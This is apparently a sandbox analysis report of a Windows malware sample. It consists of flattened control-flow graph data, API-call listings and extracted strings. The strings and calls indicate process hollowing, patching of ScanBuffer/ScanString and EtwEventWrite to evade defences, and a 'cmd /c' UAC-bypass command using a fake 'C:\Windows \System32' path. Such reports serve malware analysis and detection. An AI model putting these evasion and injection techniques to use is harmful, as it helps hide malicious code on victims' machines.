58527 4122434 16 API calls 58504->58527 58507 4151e00 58507->58425 58508->58479 58510 4102cac 11 API calls 58509->58510 58511 41519c3 58510->58511 58511->58482 58513 412150b 58512->58513 58520 41214d8 EnterCriticalSection 58513->58520 58515 4121515 58516 4102cac 11 API calls 58515->58516 58519 4121572 58515->58519 58516->58519 58518 41215c3 58518->58489 58521 41214e4 LeaveCriticalSection 58519->58521 58520->58515 58521->58518 58522->58498 58523->58497 58524->58503 58525->58507 58526->58504 58527->58507 58529 4127530 58528->58529 58529->58432 58531 411ea68 58530->58531 58532 411ea91 58531->58532 58533 411ea87 RegisterClassA 58531->58533 58534 411ea76 UnregisterClassA 58531->58534 58542 410738c 58532->58542 58533->58532 58534->58533 58536 411eabf 58537 411eadc 58536->58537 58546 411e97c 58536->58546 58537->58438 58537->58439 58539 411ead3 SetWindowLongA 58539->58537 58540->58438 58541->58442 58549 4102ffc 58542->58549 58544 410739f CreateWindowExA 58545 41073d9 58544->58545 58545->58536 58547 411e98c VirtualAlloc 58546->58547 58548 411e9ba 58546->58548 58547->58548 58548->58539 58549->58544 58551 4105e5f 58550->58551 58552 4105e1f RegOpenKeyExA 58550->58552 58568 4105c18 12 API calls 58551->58568 58552->58551 58553 4105e3d RegOpenKeyExA 58552->58553 58553->58551 58555 4105ee8 lstrcpynA GetThreadLocale GetLocaleInfoA 58553->58555 58559 4106002 58555->58559 58560 4105f1f 58555->58560 58556 4105e84 RegQueryValueExA 58557 4105ea4 RegQueryValueExA 58556->58557 58558 4105ec2 RegCloseKey 58556->58558 58557->58558 58558->58349 58559->58349 58560->58559 58562 4105f2f lstrlenA 58560->58562 58563 4105f47 58562->58563 58563->58559 58564 4105f94 58563->58564 58565 4105f6c lstrcpynA LoadLibraryExA 58563->58565 58564->58559 58566 4105f9e lstrcpynA LoadLibraryExA 58564->58566 58565->58564 58566->58559 58567 4105fd0 lstrcpynA LoadLibraryExA 58566->58567 58567->58559 58568->58556 58569 4101d08 58570 4101da0 58569->58570 58571 4101d18 58569->58571 58572 4101ff4 58570->58572 58573 4101da9 58570->58573 58574 4101d25 58571->58574 58575 4101d5c 58571->58575 58577 4102088 58572->58577 58581 4102004 58572->58581 58582 4102048 58572->58582 58578 4101dc1 58573->58578 58592 4101ec0 58573->58592 58576 4101d30 58574->58576 58617 41017c0 58574->58617 58579 41017c0 10 API calls 58575->58579 58584 4101dc8 58578->58584 58587 4101de4 58578->58587 58593 4101e98 58578->58593 58598 4101d73 58579->58598 58585 41017c0 10 API calls 58581->58585 58589 410204e 58582->58589 58590 41017c0 10 API calls 58582->58590 58583 4101f18 58586 41017c0 10 API calls 58583->58586 58601 4101f31 58583->58601 58605 410201e 58585->58605 58603 4101fc8 58586->58603 58596 4101e15 Sleep 58587->58596 58607 4101e38 58587->58607 58588 4101d99 58606 410205d 58590->58606 58591 4101d55 58592->58583 58595 4101ef1 Sleep 58592->58595 58592->58601 58594 41017c0 10 API calls 58593->58594 58609 4101ea1 58594->58609 58595->58583 58599 4101f0b Sleep 58595->58599 58600 4101e2d Sleep 58596->58600 58596->58607 58597 4101d3d 58597->58591 58641 4101b28 58597->58641 58598->58588 58604 4101b28 8 API calls 58598->58604 58599->58592 58600->58587 58603->58601 58608 4101b28 8 API calls 58603->58608 58604->58588 58610 4101b28 8 API calls 58605->58610 58614 4102043 58605->58614 58611 4101b28 8 API calls 58606->58611 58606->58614 58612 4101fec 58608->58612 58613 4101b28 8 API calls 58609->58613 58616 4101eb9 58609->58616 58610->58614 58615 4102080 58611->58615 58613->58616 58618 4101a04 58617->58618 58619 41017d8 58617->58619 58620 4101b1c 58618->58620 58621 41019d4 58618->58621 58629 4101867 Sleep 58619->58629 58630 41017ea 58619->58630 58622 4101720 VirtualAlloc 58620->58622 58623 4101b25 58620->58623 58627 41019e3 Sleep 58621->58627 58634 4101a22 58621->58634 58625 410175b 58622->58625 58626 410174b 58622->58626 58623->58597 58624 41017f9 58624->58597 58625->58597 58658 41016e0 58626->58658 58632 41019f9 Sleep 58627->58632 58627->58634 58629->58630 58633 4101880 Sleep 58629->58633 58630->58624 58631 41018c8 58630->58631 58635 41018a6 Sleep 58630->58635 58639 4101668 VirtualAlloc 58631->58639 58640 41018d4 58631->58640 58632->58621 58633->58619 58636 4101668 VirtualAlloc 58634->58636 58638 4101a40 58634->58638 58635->58631 58637 41018bc Sleep 58635->58637 58636->58638 58637->58630 58638->58597 58639->58640 58640->58597 58642 4101c08 58641->58642 58643 4101b3d 58641->58643 58644 4101784 58642->58644 58645 4101b43 58642->58645 58643->58645 58647 4101baf Sleep 58643->58647 58646 4101d02 58644->58646 58651 41016e0 2 API calls 58644->58651 58649 4101be7 Sleep 58645->58649 58650 4101b4c 58645->58650 58655 4101c1d 58645->58655 58646->58591 58647->58645 58648 4101bc9 Sleep 58647->58648 58648->58643 58652 4101bfd Sleep 58649->58652 58649->58655 58650->58591 58653 4101791 VirtualFree 58651->58653 58652->58645 58654 41017a9 58653->58654 58654->58591 58656 4101c9c VirtualFree 58655->58656 58657 4101c40 58655->58657 58656->58591 58657->58591 58659 410171d 58658->58659 58660 41016e9 58658->58660 58659->58625 58660->58659 58661 41016eb Sleep 58660->58661 58662 4101700 58661->58662 58662->58659 58663 4101704 Sleep 58662->58663 58663->58660 58664 415b5fc 58673 4105228 58664->58673 58666 415b60e RtlInitUnicodeString 58679 41050f8 58666->58679 58670 415b655 NtDeleteFile 58682 4104f68 58670->58682 58674 4105244 58673->58674 58675 410522e SysAllocStringLen 58673->58675 58674->58666 58675->58674 58676 4104f38 58675->58676 58677 4104f54 58676->58677 58678 4104f44 SysAllocStringLen 58676->58678 58677->58666 58678->58676 58678->58677 58680 41050fc RtlDosPathNameToNtPathName_U 58679->58680 58681 415b5d4 58680->58681 58681->58670 58683 4104f7c 58682->58683 58684 4104f6e SysFreeString 58682->58684 58684->58683 58685 415bcf8 58686 415bd01 58685->58686 58686->58686 58687 4104b0c 11 API calls 58686->58687 58688 415bd43 58687->58688 58689 4104a98 11 API calls 58688->58689 58690 415bd68 58689->58690 58691 411fd38 19 API calls 58690->58691 58692 415bd83 58691->58692 58693 4104b0c 11 API calls 58692->58693 58694 415bd9c 58693->58694 58695 4104a98 11 API calls 58694->58695 58696 415bdc1 58695->58696 58697 411fd38 19 API calls 58696->58697 58698 415bddc 58697->58698 58699 4104b0c 11 API calls 58698->58699 58700 415bdf5 58699->58700 58701 4104a98 11 API calls 58700->58701 58702 415be1a 58701->58702 58703 411fd38 19 API calls 58702->58703 58704 415be35 58703->58704 58705 4104b0c 11 API calls 58704->58705 58706 415be66 58705->58706 58707 411fd38 19 API calls 58706->58707 58708 415beb0 58707->58708 58709 4104b0c 11 API calls 58708->58709 58710 415bee7 58709->58710 58711 4104a98 11 API calls 58710->58711 58712 415bf0c 58711->58712 58713 411fd38 19 API calls 58712->58713 58714 415bf27 58713->58714 58715 4104b0c 11 API calls 58714->58715 58716 415bf40 58715->58716 58717 4104a98 11 API calls 58716->58717 58718 415bf65 58717->58718 58719 411fd38 19 API calls 58718->58719 58720 415bf80 58719->58720 58721 4104b0c 11 API calls 58720->58721 58722 415bf99 58721->58722 58723 4104a98 11 API calls 58722->58723 58724 415bfbe 58723->58724 58725 411fd38 19 API calls 58724->58725 58726 415bfd9 58725->58726 58772 4108eb0 58726->58772 58728 415bffe 58729 415c056 CreateProcessAsUserW 58728->58729 58730 4104b0c 11 API calls 58729->58730 58731 415c080 58730->58731 58732 4104a98 11 API calls 58731->58732 58733 415c0b1 58732->58733 58734 411fd38 19 API calls 58733->58734 58735 415c0d5 58734->58735 58736 4104b0c 11 API calls 58735->58736 58737 415c0f1 58736->58737 58738 4104a98 11 API calls 58737->58738 58739 415c122 58738->58739 58740 411fd38 19 API calls 58739->58740 58741 415c146 58740->58741 58742 4104b0c 11 API calls 58741->58742 58743 415c162 58742->58743 58744 4104a98 11 API calls 58743->58744 58745 415c193 58744->58745 58746 411fd38 19 API calls 58745->58746 58747 415c1b7 58746->58747 58748 415c2c6 58747->58748 58749 415c1c1 58747->58749 58750 41047ac 11 API calls 58748->58750 58751 4104b0c 11 API calls 58749->58751 58752 415c2e3 58750->58752 58755 415c1dd 58751->58755 58753 4104f68 SysFreeString 58752->58753 58754 415c2ee 58753->58754 58756 41047ac 11 API calls 58754->58756 58759 4104a98 11 API calls 58755->58759 58757 415c2fe 58756->58757 58758 4104f68 SysFreeString 58757->58758 58760 415c306 58758->58760 58763 415c20e 58759->58763 58761 41047ac 11 API calls 58760->58761 58762 415c313 58761->58762 58764 411fd38 19 API calls 58763->58764 58765 415c232 58764->58765 58766 4104b0c 11 API calls 58765->58766 58767 415c24e 58766->58767 58768 4104a98 11 API calls 58767->58768 58769 415c27f 58768->58769 58770 411fd38 19 API calls 58769->58770 58771 415c2a3 WaitForSingleObject CloseHandle CloseHandle 58770->58771 58771->58748 58773 4108ec3 58772->58773 58776 4104cac 58773->58776 58777 4104cde 58776->58777 58779 4104cb1 58776->58779 58778 4104788 11 API calls 58777->58778 58782 4104cd4 58778->58782 58779->58777 58780 4104cc5 58779->58780 58781 4104878 11 API calls 58780->58781 58781->58782 58782->58728 58783 412765c MulDiv 58784 4127698 58783->58784 58785 41276ae 58783->58785 58849 4127618 GetDC SelectObject GetTextMetricsA ReleaseDC 58784->58849 58799 4120204 58785->58799 58788 412769d 58788->58785 58850 4104820 58788->58850 58789 41276ba 58803 41202a4 58789->58803 58795 4127701 58800 412020a 58799->58800 58801 41202a4 14 API calls 58800->58801 58802 4120222 58800->58802 58801->58802 58802->58789 58804 41202b1 58803->58804 58805 41202cb 58803->58805 58806 41202c1 58804->58806 58807 41202b7 RegCloseKey 58804->58807 58809 4120308 58805->58809 58808 4120274 13 API calls 58806->58808 58807->58806 58808->58805 58810 4104820 11 API calls 58809->58810 58811 4120331 58810->58811 58813 4120351 58811->58813 58860 4104cec 11 API calls 58811->58860 58814 4120373 RegOpenKeyExA 58813->58814 58815 4120385 58814->58815 58820 41203c1 58814->58820 58816 41203af 58815->58816 58818 4104b0c 11 API calls 58815->58818 58861 41202d0 13 API calls 58816->58861 58818->58816 58819 41203bc 58824 4104788 11 API calls 58819->58824 58821 41203de RegOpenKeyExA 58820->58821 58822 41203f0 58821->58822 58828 4120429 58821->58828 58823 412041a 58822->58823 58825 4104b0c 11 API calls 58822->58825 58862 41202d0 13 API calls 58823->58862 58826 41204a1 58824->58826 58825->58823 58826->58795 58834 4120538 58826->58834 58829 4120443 RegOpenKeyExA 58828->58829 58829->58819 58830 4120455 58829->58830 58831 412047f 58830->58831 58832 4104b0c 11 API calls 58830->58832 58831->58819 58863 41202d0 13 API calls 58831->58863 58832->58831 58864 4120510 58834->58864 58837 4120552 58839 4104878 11 API calls 58837->58839 58838 41205a1 58840 4104788 11 API calls 58838->58840 58841 412055d 58839->58841 58847 4120596 58840->58847 58867 41205b0 43 API calls 58841->58867 58843 4120575 58844 4120581 58843->58844 58845 4120598 58843->58845 58848 4104ed4 11 API calls 58844->58848 58868 412019c 42 API calls 58845->58868 58854 4120274 58847->58854 58848->58847 58849->58788 58852 4104824 58850->58852 58851 4104848 58851->58785 58852->58851 58853 4102cc8 11 API calls 58852->58853 58853->58851 58855 41202a0 58854->58855 58856 412027e 58854->58856 58855->58795 58857 4120284 RegFlushKey 58856->58857 58858 412028a RegCloseKey 58856->58858 58857->58858 58859 4104788 11 API calls 58858->58859 58859->58855 58860->58813 58861->58819 58862->58819 58863->58819 58869 41204c0 58864->58869 58866 4120524 58866->58837 58866->58838 58867->58843 58868->58847 58870 41204d9 58869->58870 58871 41204ed RegQueryValueExA 58870->58871 58872 4120504 58871->58872 58872->58866
                                                                                                    APIs
                                                                                                    • InetIsOffline.URL(00000000,00000000,04167AA9,?,?,?,000002BA,00000000,00000000), ref: 0415CA75
                                                                                                      • Part of subcall function 0411FD38: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,0411FE14), ref: 0411FD70
                                                                                                      • Part of subcall function 0411FD38: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FD7E
                                                                                                      • Part of subcall function 0411FD38: GetProcAddress.KERNEL32(74AD0000,00000000), ref: 0411FD97
                                                                                                      • Part of subcall function 0411FD38: GetCurrentProcess.KERNEL32(0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FDB3
                                                                                                      • Part of subcall function 0411FD38: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FDB9
                                                                                                      • Part of subcall function 0411FD38: GetCurrentProcess.KERNEL32(0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0411FDE3
                                                                                                      • Part of subcall function 0411FD38: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000), ref: 0411FDE9
                                                                                                      • Part of subcall function 0411FD38: FreeLibrary.KERNEL32(74AD0000,00000000,0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000), ref: 0411FDF4
                                                                                                      • Part of subcall function 04108DE0: GetFileAttributesA.KERNEL32(00000000,?,0415D4C6,ScanString,0419A350,04167AE0,OpenSession,0419A350,04167AE0,ScanString,0419A350,04167AE0,UacScan,0419A350,04167AE0,UacInitialize), ref: 04108DEB
                                                                                                      • Part of subcall function 0410D570: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0428EB38,?,0415D7E7,ScanBuffer,0419A350,04167AE0,OpenSession,0419A350,04167AE0,ScanBuffer,0419A350,04167AE0,OpenSession), ref: 0410D587
                                                                                                      • Part of subcall function 0415B768: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0415B838), ref: 0415B7A3
                                                                                                      • Part of subcall function 0415B768: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0415B838), ref: 0415B7D3
                                                                                                      • Part of subcall function 0415B768: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0415B7E8
                                                                                                      • Part of subcall function 0415B768: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0415B814
                                                                                                      • Part of subcall function 0415B768: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0415B81D
                                                                                                      • Part of subcall function 04108E04: GetFileAttributesA.KERNEL32(00000000,?,0416062B,ScanString,0419A350,04167AE0,OpenSession,0419A350,04167AE0,OpenSession,0419A350,04167AE0,ScanBuffer,0419A350,04167AE0,ScanString), ref: 04108E0F
                                                                                                      • Part of subcall function 04108FCC: CreateDirectoryA.KERNEL32(00000000,00000000,?,041606D1,ScanBuffer,0419A350,04167AE0,ScanString,0419A350,04167AE0,OpenSession,0419A350,04167AE0,OpenSession,0419A350,04167AE0), ref: 04108FD9
                                                                                                      • Part of subcall function 0415B684: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0415B756), ref: 0415B6C3
                                                                                                      • Part of subcall function 0415B684: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0415B6FD
                                                                                                      • Part of subcall function 0415B684: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0415B72A
                                                                                                      • Part of subcall function 0415B684: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0415B733
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Path$Name$AttributesCloseCreateCurrentLibraryMemoryModuleName_ProcessVirtualWrite$AddressDirectoryFreeHandleInetInformationLoadOfflineOpenProcProtectQueryRead
                                                                                                    • String ID: .png$.url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\System32\\easinvoker.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$advapi32$bcrypt$can$cmd /c "C:\\Windows \\System32\\easinvoker.exe"$connect$endpointdlp$http$iexpress.exe$kernel32$mssip32$ntdll$psapi$smartscreenps$spp$sppc$sppwmi$wintrust$ws2_32
                                                                                                    • API String ID: 2178617691-2902499223
                                                                                                    • Opcode ID: f67b1b7f63505c1257df03c2e043f33af5c7b3292713832c6b5e202856b9ca36
                                                                                                    • Instruction ID: 843f30ae758ad4bf3dbb204f0877f12b2cd5b0b34b56e68e1326c52a54081836
                                                                                                    • Opcode Fuzzy Hash: f67b1b7f63505c1257df03c2e043f33af5c7b3292713832c6b5e202856b9ca36
                                                                                                    • Instruction Fuzzy Hash: E7F30D356011198BEB11EB64DDC1BDEB3B9EF88208F1085E6E209A7294DF74FE858F54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 4211 4127e4c-4127e4f 4212 4127e54-4127e59 4211->4212 4212->4212 4213 4127e5b-4127ee9 call 4104c3c call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 4212->4213 4230 4127eef-4127fca call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 4213->4230 4231 41296ad-41296f5 call 41047ac * 2 call 4104f68 call 41047ac 4213->4231 4230->4231 4268 4127fd0-41282e0 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 410320c * 2 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 41050e8 call 41050f8 CreateProcessAsUserW 4230->4268 4375 41282e2-412834e call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 4268->4375 4376 4128353-41285d5 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4102f9c call 4102fc4 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 GetThreadContext 4268->4376 4375->4376 4376->4231 4464 41285db-412883e call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 NtReadVirtualMemory 4376->4464 4535 4128844-41289ad call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 NtUnmapViewOfSection 4464->4535 4536 4128b4b-4128bb7 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 4464->4536 4621 41289d7-4128a43 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 4535->4621 4622 41289af-41289cb call 411fb80 4535->4622 4564 4128bbc-4128ccb call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 411fb80 4536->4564 4564->4231 4629 4128cd1-4128dca call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4127d5c 4564->4629 4630 4128a48-4128b3f call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 411fb80 4621->4630 4627 41289d0-41289d5 4622->4627 4627->4630 4702 4128e1e-41296a8 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 NtWriteVirtualMemory call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 NtWriteVirtualMemory call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 SetThreadContext NtResumeThread call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4102cc8 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 411fcd8 * 3 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 411fcd8 * 4 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 4629->4702 4703 4128dcc-4128e19 call 4127c54 call 410737c 4629->4703 4701 4128b44-4128b49 4630->4701 4701->4564 4702->4231 4703->4702
                                                                                                    APIs
                                                                                                      • Part of subcall function 0411FD38: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,0411FE14), ref: 0411FD70
                                                                                                      • Part of subcall function 0411FD38: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FD7E
                                                                                                      • Part of subcall function 0411FD38: GetProcAddress.KERNEL32(74AD0000,00000000), ref: 0411FD97
                                                                                                      • Part of subcall function 0411FD38: GetCurrentProcess.KERNEL32(0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FDB3
                                                                                                      • Part of subcall function 0411FD38: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FDB9
                                                                                                      • Part of subcall function 0411FD38: GetCurrentProcess.KERNEL32(0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0411FDE3
                                                                                                      • Part of subcall function 0411FD38: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000), ref: 0411FDE9
                                                                                                      • Part of subcall function 0411FD38: FreeLibrary.KERNEL32(74AD0000,00000000,0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000), ref: 0411FDF4
                                                                                                    • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0419A408,0419A3F8,OpenSession,0419A3D0,04129710,ScanString,0419A3D0), ref: 041282D9
                                                                                                    • GetThreadContext.KERNEL32(000008A0,0419A44C,ScanString,0419A3D0,04129710,UacInitialize,0419A3D0,04129710,ScanBuffer,0419A3D0,04129710,ScanBuffer,0419A3D0,04129710,OpenSession,0419A3D0), ref: 041285CE
                                                                                                    • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(000008A4,0021EFF8,0419A520,00000004,0419A528,ScanBuffer,0419A3D0,04129710,ScanString,0419A3D0,04129710,Initialize,0419A3D0,04129710,UacScan,0419A3D0), ref: 0412882B
                                                                                                    • NtUnmapViewOfSection.N(000008A4,00400000,ScanBuffer,0419A3D0,04129710,ScanString,0419A3D0,04129710,Initialize,0419A3D0,04129710,000008A4,0021EFF8,0419A520,00000004,0419A528), ref: 041289A6
                                                                                                      • Part of subcall function 0411FB80: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 0411FB8D
                                                                                                      • Part of subcall function 0411FB80: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0411FB93
                                                                                                      • Part of subcall function 0411FB80: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0411FBB3
                                                                                                    • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(000008A4,00400000,00000000,17D2D400,0419A528,ScanBuffer,0419A3D0,04129710,ScanString,0419A3D0,04129710,Initialize,0419A3D0,04129710,ScanBuffer,0419A3D0), ref: 04128F89
                                                                                                    • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(000008A4,0021EFF8,0419A524,00000004,0419A528,ScanBuffer,0419A3D0,04129710,ScanString,0419A3D0,04129710,Initialize,0419A3D0,04129710,000008A4,00400000), ref: 041290FC
                                                                                                    • SetThreadContext.KERNEL32(000008A0,0419A44C,ScanBuffer,0419A3D0,04129710,ScanString,0419A3D0,04129710,Initialize,0419A3D0,04129710,000008A4,0021EFF8,0419A524,00000004,0419A528), ref: 04129272
